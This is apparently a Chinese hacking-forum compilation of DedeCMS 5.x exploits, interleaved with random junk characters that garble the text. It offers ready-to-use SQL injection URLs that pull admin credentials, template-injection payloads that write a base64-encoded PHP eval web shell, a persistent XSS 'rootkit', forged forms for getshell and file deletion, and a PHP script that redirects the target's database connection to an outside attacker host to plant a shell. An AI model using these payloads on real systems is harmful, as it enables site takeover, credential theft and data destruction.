|
|
% u; {. r6 a' E* R( J3 p
Dedecms 5.6 rss注入漏洞( m U2 w0 _, R* S. A% p& C- J
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=15 [( @: v3 _! b* U2 M
0 _. q. L1 o5 g& k- }$ j/ ?1 g2 g4 j( L8 w0 q, T! [
% T( f! J/ o: t" B# \
. L. x- Z9 a& H+ B/ n O
( o9 G. q' j* t# l: a* S: T4 r& f$ a" _; U/ P
9 Q3 I: T, @+ u: M4 ~: c4 {9 @3 W
9 Q) d4 i( `& ^/ a3 ~DedeCms v5.6 嵌入恶意代码执行漏洞; g- ]; ]6 _6 z
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}3 D+ a6 }9 g% T7 C* b; X
发表后查看或修改即可执行0 X) b/ ]% j* v7 b: P
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}7 l' o& w) r: {5 I
生成x.php 密码xiao,直接生成一句话。9 `$ L+ ]9 H4 r k- U0 I
6 P% f& O1 R8 F
' D7 {, g6 j/ w! k) j6 W. s. `
8 h& U, V; \$ B) A4 Y3 R! i+ C* k) w5 F; L" c/ c& a
! w+ M& a2 [, f$ T* M/ T
" \" z1 G% g2 E! v8 h/ }
( y$ X8 M: Q, y" H9 y4 e
0 w! a# `! ?4 D1 l0 ]Dede 5.6 GBK SQL注入漏洞
! W* Y+ A/ H' z0 G. r9 Qhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';4 z! t! R3 M% [& ^5 E6 h& P
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
9 |! u+ P8 R2 W* O; T/ U0 i7 b% Nhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A78 r+ |: n! u' s" ]! ?8 [
' @# U! R+ }! f, L2 b' L
7 I Q9 @2 l; _. x
( _& ^" V% V$ V r: P3 x! K
* t) ]3 v* r* d/ d* @" M: A2 a& V" R
0 h6 v# U5 K4 i j: k3 _
' D/ e% J! r( u$ |1 |: o; W" c
* L5 M ~" [2 ?4 T& cDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
5 a# l; _' @. Ihttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 9 g/ V$ ?; q0 A$ [0 {6 w" r- I; o; Y
# i! u, [. |% [6 R$ r# r( X
% E9 S# b" i0 q$ e M! P# S
4 \1 p4 w6 b* I" n) ^. c( d* _. S+ H
v0 m4 x2 n: J1 ~% N! s
6 m% ]5 \* K4 [) s* P
DEDECMS 全版本 gotopage变量XSS漏洞
1 F7 B y1 ^: _) {; m1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
. v4 G8 ^$ n7 e# M; ?http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
4 Y( m4 X- }, A; N# V% C& q) y/ d
! g9 ~$ _) [) J* K; ?& y+ f+ L/ B( U8 J% a, g D% }" Y5 U
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 0 Y/ Z& _* _( _. x/ z6 A2 p% b: h
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
! H) j6 Z3 W' y" M& U$ Q% z! g6 Z; b# J0 H
# h' z& c1 N& I% k+ Rhttp://v57.demo.dedecms.com/dede/login.php
; d+ F5 s" z5 u: r& r; X& f
X9 ^4 F+ C j) ]1 [! d q( d- A( C ^; ^' w
color=Red]DeDeCMS(织梦)变量覆盖getshell
0 [* {$ b4 I( F. j D9 Q/ \5 S2 |#!usr/bin/php -w8 \) w; }1 O* c6 E+ i1 b" R6 ?
<?php: B' `. i! X: v9 i& y1 t
error_reporting(E_ERROR);
% _) o8 P. I$ Z5 pset_time_limit(0);
6 L2 W. r9 L, q) _' j# @( eprint_r('* p2 u, [) [$ k
DEDEcms Variable Coverage3 x* |! c R$ {) x% I3 [
Exploit Author: www.heixiaozi.comwww.webvul.com- Y6 s& F0 o% U- S: J5 G+ E( }$ t
);
# S* ^$ i+ F) `7 p3 j+ ~# Gecho "\r\n";1 S, l) P/ T; ~- ~3 x# O' @& y
if($argv[2]==null){* o& j6 K3 }# w; k
print_r(' o: U6 ?' P# [1 o2 c. ?; O
+---------------------------------------------------------------------------+
2 p2 h4 k5 Y) X7 M% vUsage: php '.$argv[0].' url aid path
~/ m0 Y5 y y8 F0 Kaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
; ]" N, ?3 h+ v" [6 [: i/ y; FExample:. i: n4 f7 J- c3 a
php '.$argv[0].' www.site.com 1 old
- H# J6 o# h1 ?+---------------------------------------------------------------------------+9 I% p9 ?0 X6 @3 F. A& U
');/ u6 x- }1 J: f- b% b: U+ J
exit;
% v3 ^3 K. r" w}$ f3 D5 @5 _: u9 ~" _
$url=$argv[1];2 V% I$ k8 O, O
$aid=$argv[2];
7 f6 u1 p- M( `9 a$path=$argv[3];( I$ K9 b) V9 z$ o4 F& g5 l5 s
$exp=Getshell($url,$aid,$path);( o& `$ A+ o7 s4 W
if (strpos($exp,"OK")>12){8 W" T- U) k: @" A Z1 c+ X3 L
echo ") e, U6 s" q. W1 |- I
Exploit Success \n"; d6 s8 m# {, d+ S. n6 X
if($aid==1)echo "
O4 i* v- N `( y7 p+ tShell:".$url."/$path/data/cache/fuck.php\n" ;/ K: [! A: T1 W
, w1 g1 C1 ?# `* E- G- ]
: K9 ~4 t/ m" B- F( cif($aid==2)echo "
% M5 n. h. |" A+ c/ tShell:".$url."/$path/fuck.php\n" ;3 T9 O. K3 ]6 Q: {
, \+ q' [. w9 p# O8 t8 F4 ~
5 N" L8 H8 c8 f/ P, B+ L& r8 rif($aid==3)echo "
- }, ~4 f- A& T7 |* @Shell:".$url."/$path/plus/fuck.php\n";
+ n& N X) a; ?9 \! V) e& c! g% t3 G3 q7 `2 e. P# F* y3 A
1 d! `$ J5 K, K+ S \+ x
}else{) [& a' V" `7 g+ M4 `/ g( e5 [
echo "# h+ g3 _, b5 ]6 a, ?- }3 l' j
Exploit Failed \n";+ v- {) ~5 R; `2 {; {
}+ P( m) K! s. S$ J
function Getshell($url,$aid,$path){
0 E2 Q% T& \' c) A$id=$aid;
9 O l9 w2 }4 n8 z7 \: q$host=$url;8 z1 {8 O/ G* d
$port="80";
7 {7 X g+ E& e7 W t$ X$ _$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";9 {! c# t2 [. {9 A. D& Z' T
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";3 n& s' w6 k$ x; Q
$data .= "Host: ".$host."\r\n";+ k2 z, C# H9 v0 P& K( a
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
0 w- k# w# b2 E( W# h; K! ?$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";- e* A# [- ?/ Z) z. d' ?
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";! M& M. u( e/ t- i5 n" a7 ?# U
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$ i9 C$ r2 D) B! ]% I$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
) k$ x6 l2 v; ~: R/ U9 n# _$ F& G& Y: q$data .= "Connection: keep-alive\r\n";7 x7 B! P# ~% O- s i0 A# B$ E
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- f, z/ ~7 y( U' g* m! _$data .= "Content-Length: ".strlen($content)."\r\n\r\n";0 d2 h8 ^1 n& I! j T* p p7 v9 e
$data .= $content."\r\n";
8 x- x3 F% ?# k$ock=fsockopen($host,$port);0 v0 I d7 i! g% X+ s3 v# C8 R
if (!$ock) {2 O3 t% }! F! [$ b8 J) J% J! ~
echo "
$ y9 W1 q. a1 Q( N7 S* Z W1 h& _No response from ".$host."\n";7 U9 S Y: |" I' g2 m4 o6 ?
}
! y9 G% I3 f( b. s4 l9 N4 C9 Yfwrite($ock,$data);
P3 s& Y$ { {; f4 O( gwhile (!feof($ock)) {( S: M) z+ r6 ~1 I# y4 T/ R% a
$exp=fgets($ock, 1024);6 T% J6 A9 e& r* f
return $exp;* k5 `3 A- R3 l: `1 d0 K# [9 F
}( t' [7 E! r8 }; c; f b9 y
}& a4 V. I3 {+ F s* O4 c
( F; O" W% R( l2 D
) O) w. F3 R% u# y% J?>' q7 T; M; Q' a& t; G7 @
/ G8 N7 N+ I$ \3 ]/ Y/ L
$ z. W' l2 B# J& _
' }5 t* S5 V l- A1 O0 W& x9 z, c3 T6 ?9 f( i) |! f4 N, d/ E
3 U: V7 A/ z7 H1 v# @3 p7 z$ e. w# X8 a; p+ ]$ }0 p
O: V0 b- H; b" T. D4 [1 I
! }8 H8 O$ M( j
9 s, L5 _2 x" ~2 b& w z
5 Q5 M2 A5 Z2 z5 o2 GDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)( }" n% A" k1 y
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root6 ?8 ?5 C; c1 y% w9 p! B8 J K
, M( n0 Y3 |" l8 n) e
8 |4 o. z% x6 `% P9 ~# f
把上面validate=dcug改为当前的验证码,即可直接进入网站后台9 {& B# U9 e1 b, p2 T, q
5 T& f1 U' E! K
! p( Q4 x8 s; q. s& f! ~* R+ ]
此漏洞的前提是必须得到后台路径才能实现$ p2 N6 W+ v/ A
) q) h$ G. Z5 Z" u& g1 w0 e2 i
+ E$ s# E- `' | z" s% {
( P. K( a! E" P2 N1 ~
/ Y6 l( e, g3 C( T- z- Z5 S
! E" {& ^/ u0 u5 T- M( h3 C
; {8 h1 j) p- l j1 y8 L8 K7 F
* Y+ A* {2 E; E- P( f4 X: e. I( a9 G" L5 ~% f+ w3 h
. W3 }' ^( P* c2 l' T
Dedecms织梦 标签远程文件写入漏洞
) e+ i& X% U6 a+ `% G前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');# D( d3 C3 z3 W6 j- r6 U& Y* \
4 ?1 Q; Q9 B! g: H3 l8 C1 R
( l9 `) {7 W: K) e0 p3 L; e再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
! o* T# W8 z" d, y0 x<form action="" method="post" name="QuickSearch" id="QuickSearch">$ ^* b8 \9 \$ K" x9 M
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
7 [3 y; Q) P: G# j2 B) `1 c, q I8 T<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
" a1 D, h! i: s) e% Z<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />, O) Q+ V f! ]! [9 X1 X+ h8 {8 Q
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
. [" |) b; E! V<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
6 {+ j) _- t9 _# }; u<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 u8 r: n. B C; ?4 r& H<input type="text" value="true" name="nocache" style="width:400">
1 f2 |& W, P) P" m7 {4 W3 r<input type="submit" value="提交" name="QuickSearchBtn"><br />
A- U2 _, M; u$ }9 C</form>+ a3 u* O) C1 \2 [
<script>
3 F- K' H. Y8 A) S# ?7 |& _function addaction()0 J& J5 k4 ]& u8 ~7 X+ K) ~4 ^
{8 ^& d" \% a6 w D
document.QuickSearch.action=document.QuickSearch.doaction.value;
% m0 `3 R0 U$ v% L6 X* Y% H}# h& m3 B/ R$ d5 _5 h
</script>
/ @8 v! `5 X$ y! `
( y0 Z. `# L( b) W" p
- W; V# S' u( l* ~/ N5 U+ P+ l7 U# y" }2 i! X+ @
0 S% t; Y9 p9 I* c }9 j: v E- `: X) E9 B6 r' O
3 B; b9 d- A2 y
3 I& A' g6 h- R5 [/ z/ C7 ^% X& G% p, S- |9 [$ E4 L3 x
1 l1 k0 b5 ~$ ]7 T f2 J9 `6 Q( A/ D+ J- l: e
DedeCms v5.6 嵌入恶意代码执行漏洞
" B& C4 V0 ^- E$ e注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行5 G k5 N1 b O% k6 r9 {
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
5 ^; }. ^/ y7 ]3 b; I. F4 J生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得0 Y5 |! Z2 c& n) |2 z( P
Dedecms <= V5.6 Final模板执行漏洞
9 b+ A. ]1 t* ?1 v% o( z注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:8 ~0 Z# k9 P/ K0 |$ d
uploads/userup/2/12OMX04-15A.jpg
" y5 o$ s3 N) ~7 @: Z( i. N
( H* L1 V2 X) y5 y7 S) L7 d/ P3 L+ z2 u
模板内容是(如果限制图片格式,加gif89a):
8 B9 e0 {. u$ B8 f* E* p{dede:name runphp='yes'}4 H- ]4 U9 J v7 J
$fp = @fopen("1.php", 'a');
; a. l, h$ g3 T+ a, S+ U7 ?& O- K@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n"); N" }) z8 M8 h9 C4 T ]1 p2 G
@fclose($fp);4 s0 F0 l/ P+ h, c! G, D1 e8 w
{/dede:name}
2 j. u) [' |' @7 I; Y5 R2 修改刚刚发表的文章,查看源文件,构造一个表单:
3 h1 q! W9 s4 x! f( z, R5 c<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
3 m M& H* J9 ^( U& r9 \& X/ q<input type="hidden" name="dopost" value="save" />) C* P7 v2 {, ~" x
<input type="hidden" name="aid" value="2" />, u& |" i0 j1 z$ @: F
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" /># b; o! n3 _% e- ?: x1 N
<input type="hidden" name="channelid" value="1" />4 w7 ~( b, Z {
<input type="hidden" name="oldlitpic" value="" />3 L4 S7 N! ]( m; |
<input type="hidden" name="sortrank" value="1275972263" />
" R! ^' V3 c2 D8 ]6 g g/ h3 ?, H1 c. Q) U
- m( n: a- i# A/ g4 C<div id="mainCp">
. Y6 ], ?+ a6 O9 n1 M<h3 class="meTitle"><strong>修改文章</strong></h3>
9 x: \$ z7 x8 i" h+ U
1 s$ z- @& p7 m8 l' m. e
8 o3 t) N7 B6 x: _6 m1 N+ k<div class="postForm">( z3 ]4 r6 m: k- l* T
<label>标题:</label>
/ u# m& ^4 \# f/ j2 z<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
+ n- H* _" @' {- H! y2 ?) e
9 R, e1 }$ Z f2 E6 F. T4 X7 u" A0 r( k
<label>标签TAG:</label>
8 R4 j2 ~0 ]" P! l2 Y: s2 \<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)! y& E7 p2 x) ?+ H5 ?
5 M9 S; z! c2 x& i$ G1 V+ q% G( i9 S& _0 ?8 O% h8 U v
<label>作者:</label>
# [( B, `/ a9 ]% z6 A! S& ` _* k<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>5 E* P% l X( s- u" H K
7 m V% |" h' J; D: Z$ o2 C4 O! n' [/ G; O- `: M
<label>隶属栏目:</label>! c3 a4 ~- v! O. e9 v9 b/ t b m5 C
<select name='typeid' size='1'>
2 P9 a3 H0 X& Y& M- P<option value='1' class='option3' selected=''>测试栏目</option>/ r; t+ w8 A2 c, |) V m0 l
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)- H/ Z6 k) l/ f% l
( Q1 q2 X: q% u+ r0 i8 }; ^. }( @0 T* Q
2 ]7 V4 F% D; d o# `' V<label>我的分类:</label>
1 T* s X) f/ Q; l$ X* C<select name='mtypesid' size='1'>; ~1 g: \, I0 g# G/ i% L7 b
<option value='0' selected>请选择分类...</option>6 G- A5 h, r# Z- y
<option value='1' class='option3' selected>hahahha</option>
& R2 \4 T9 y0 m9 r# l, A |% d</select>1 B+ A8 [/ ^; o6 ]
3 x( q( ? T4 C1 r% B% o4 u
O6 P3 s& C2 r7 F! ~<label>信息摘要:</label>
: J- H+ ^, ?8 ]- k/ J<textarea name="description" id="description">1111111</textarea>
" D" G6 y: Y; F- P3 x$ }' G; T(内容的简要说明)3 K& X4 I0 x* L- X: V
& o! H0 S8 o4 H9 W; {& I! O& ?$ \# ^
<label>缩略图:</label>) V6 J7 F a7 f$ Y- `: R0 a
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/># A: J6 ~# g" B5 T- @; e# ^; U- m
+ f9 f: B: ?5 W/ {/ t( I8 E. H) v/ B" u/ B; P
<input type='text' name='templet'% I: O+ a# |6 @. R) ?' h# ?
value="../ uploads/userup/2/12OMX04-15A.jpg">. d9 P3 J+ M; F
<input type='text' name='dede_addonfields'$ a# c/ y' N3 t# K- L
value="templet,htmltext;">(这里构造)' g" J! K' d' h, p; z- w% O3 d
</div>
' X2 G2 S. v3 w' L o1 ]# L
3 D3 M6 n d% x: l+ y6 \' ?# ]% e7 y! s: r
<!-- 表单操作区域 -->
3 c9 l) z% W$ D( ?<h3 class="meTitle">详细内容</h3>
( S+ T1 I. c: d& v
+ l. |! L. S# e0 O! V
& Y* x! z' n3 @! ^<div class="contentShow postForm">$ U. Q( \5 H' i# `; _5 o1 V t+ p
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
) R6 T& g4 y' b8 `4 H0 t$ v( s9 [" }" @
$ l& b$ q0 {! e$ p( o
<label>验证码:</label>
; I8 K7 j: V. z: f5 \; b<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
5 T) a& ? h& x# t! ?5 c<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />' G$ J. c" y* w
3 l m: O( N" q- Y
0 l- y9 {5 g2 {3 W* S9 p* \% Y
<button class="button2" type="submit">提交</button>
: x& s) p2 @ y; H8 X! c8 n* B3 H* |<button class="button2 ml10" type="reset">重置</button>& E5 ~) C) Q& m% G
</div>% S' A1 q/ U- d- W
. \1 }; j% m) G9 X; u) H/ g+ |
7 [8 O. M. u# K6 T) N</div> C- ?* s0 ~7 z
6 ^+ _7 R& Q; n4 a5 `+ S7 Z; @9 d; D
^$ c$ B2 a4 \. y: Z) N- w
</form>+ w; w7 [. G9 O6 ~- }! ]+ T! v! j5 ^
4 z5 d3 Y( @8 I8 U
- P( w8 A( K7 Z) T6 V. N# w3 P提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:1 b9 I, d; |. |
假设刚刚修改的文章的aid为2,则我们只需要访问:* C/ t7 T2 X* p% C
http://127.0.0.1/dede/plus/view.php?aid=2
2 D' K8 l- w8 K$ G: d% k( E即可以在plus目录下生成webshell:1.php6 b& Y* P# x% V- t' c
1 W+ W6 o5 E& U
( v4 i! I3 b& `
! x- X: X( [" X- d$ _
# F1 \4 O( W! _ I; V+ I8 q8 p) N4 c4 w3 O# h/ O
: u7 |# ~3 s9 f& V M4 [8 E0 S
1 N+ r E9 w4 S+ c8 w* K: [1 j* G4 N7 S7 q
1 l: j x) b& v* |
/ P N& q" t$ q) } {5 S6 o- m
9 L) q% K1 [7 S+ c4 ^5 u2 r
7 x) H3 A: f8 N, uDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
+ ]* X! D9 Q2 E, D y$ A! X6 cGif89a{dede:field name='toby57' runphp='yes'}
: b3 ?+ b* z* w% S0 Q4 Rphpinfo();
0 _% U! I4 Z2 C{/dede:field}, O, ?, ^) m1 G5 L
保存为1.gif, y# B. Y o( q% T
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
; R, e, M" x" {3 H" |<input type="hidden" name="aid" value="7" />
( ]: B R( Z! ?+ A0 G/ N3 R<input type="hidden" name="mediatype" value="1" />
8 p% O& g0 {$ J0 C4 U! F" f4 V<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> * k+ F, Z* J, @3 N
<input type="hidden" name="dopost" value="save" />
" s9 r$ s/ o# t7 X4 r$ [/ p2 j; H3 Q<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
) X+ J) x1 z' D& ?3 S% k" L+ _- N<input name="addonfile" type="file" id="addonfile"/> 7 j: r c, X( i1 d, g9 A0 W- p" o
<button class="button2" type="submit" >更改</button> 3 v9 \1 Q( D: o) d3 k
</form> t1 l$ Z9 a7 n' {( Y
# F; m$ X( I3 W7 l- \% ^7 L* q! @% U0 j3 O' Z" f& k% u
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
( _; S6 n, p$ W/ w: x5 G- N' o; I, A发表文章,然后构造修改表单如下:
& x4 q% n: F- G, z# |; D* V) Z5 Q# W& Q) |+ q+ L
6 x2 x! e& ^8 L" t) H7 \<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
5 e" y. Y4 C* T8 e4 f<input type="hidden" name="dopost" value="save" />
# ?* }$ |( W5 t" s6 ]! p<input type="hidden" name="aid" value="2" /> $ C2 [/ E5 U: k9 b) Y( z
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ! D2 ?" m g2 P- z: O; @/ v
<input type="hidden" name="channelid" value="1" />
; |8 M/ U8 D8 t3 Q+ a$ o. X8 z<input type="hidden" name="oldlitpic" value="" />
! g8 ]* t$ n- g' M* T* u; {7 x<input type="hidden" name="sortrank" value="1282049150" /> $ @% k; c4 r% ?, Z4 w4 j7 y# D \
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
# F# X) t' ?5 g! V<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> % w: M" }( \$ ~5 r9 {; v
<select name='typeid' size='1'> 6 t0 u9 y( R+ D; R J* J7 e
<option value='1' class='option3' selected=''>Test</option>
5 e- Z. ~8 A8 G/ D! N<select name='mtypesid' size='1'>
3 u+ O$ N. y0 Y, T& E<option value='0' selected>请选择分类...</option>
9 x H' l; a" N2 X1 y<option value='1' class='option3' selected>aa</option></select>
# t) U5 {8 O% a4 E: Y<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> p3 Z1 w- I* ^* y& ` B
<input type='hidden' name='dede_addonfields' value="templet"> 7 I0 _7 P2 D2 l, m
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
% w4 E% j( n2 A; u3 g8 k( Z' ^<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
% ?0 Y% b c6 L* \' i7 }) s4 ?<button class="button2" type="submit">提交</button>
5 j, \1 r( ~2 G: F" M5 h</form>
$ C# g$ n. r/ r1 \
. F4 A& Y1 F: D8 v
5 D! K9 `. T- Y5 m2 ^: K9 c
: p# j7 h9 h ~/ A& E
5 D: z% A- [' t
z) i8 s1 O% m' y( h
( s2 W- f1 g$ H5 Q+ {
- f6 k- F, Q2 o7 p$ R7 x h, b# T, F0 h4 D2 x
: v0 m& Y1 B) S
! N1 t( ~- A# k. n) p
# q5 d! c/ ]$ R& p/ u
, F/ q% a7 [+ s2 ]% p织梦(Dedecms)V5.6 远程文件删除漏洞
; |. o( @6 I- ~% Lhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif7 B5 R$ Q8 t; m0 p: s1 i8 j7 y
. e; x o* F6 J
9 a( T9 U) o2 a/ H) ^
7 f4 I7 o9 c; [. `& T( ?9 j% b
+ k. ~) C& n$ _: |1 @+ K5 V: L( p+ U& _! ?( K
' b0 H* `8 Q1 c# x+ |( o; O4 R5 ]2 |: W! k$ A# V
8 ]% s1 F' V$ P7 @
p$ T1 e: ~2 q' M* n6 O4 S' N
- E* D! y) j( k
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
9 K2 R# i9 n& s5 b8 ^4 d- Fhttp://www.test.com/plus/carbuya ... urn&code=../../
' \* S# K# O' f, a& V- j
7 o/ M: B& i) ?; q- a% O( _) t+ q7 \/ F9 Y+ c
" r, K1 M7 i3 Z! L
9 u$ L Y* j! ^" Y3 X6 F) [0 U) ^3 @/ R& c; N8 m- H7 |6 u
; x8 _# e; B H2 u, [/ t
- W2 o6 T( a4 j
" o+ y3 s- w# I3 K4 ^! j
* u/ r; T& S8 k6 b5 j
: S7 @+ B/ Q/ I) j+ iDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
3 Z& x- G# b* E9 l) N: b Vplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 q. f! K( \" D9 l1 Z3 d密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD55 y, P( q$ g$ f/ t0 F c
- v; |/ U5 l; h" X; G# R: |5 c
v; @* }3 k9 x7 |% g3 [% \, j7 x {# E5 J8 ]1 i0 u- @
, c2 J7 s' R3 h' N$ w$ V
e/ w8 R- y7 }6 L# h, [
- X1 K5 `- c5 b- ~$ \) a, n! w- Y( y
, q' B3 `) D. F4 J5 t. @, I
) ~2 H1 V p; `- R
5 Q6 u. z( O/ h4 x! |. J
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
: w n- r% d# j+ c& I, p" R; fhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
9 L# M7 C; q7 E+ J+ j
. C8 s% [ f, W# Q+ T; |; r, Z
5 G8 h% g9 A- Z$ v: h; D$ O2 i7 W( v& G
5 \% s- Z* B" M' ~$ n# S' g- J) Y a0 Z4 q, F" f- Z. S
0 Z" U$ q+ H/ p* a* P1 C$ L( g6 v' @- J+ ^' Y; P
# e4 r4 s- y7 `( S6 N: \% ]5 Y' o; K6 A$ w
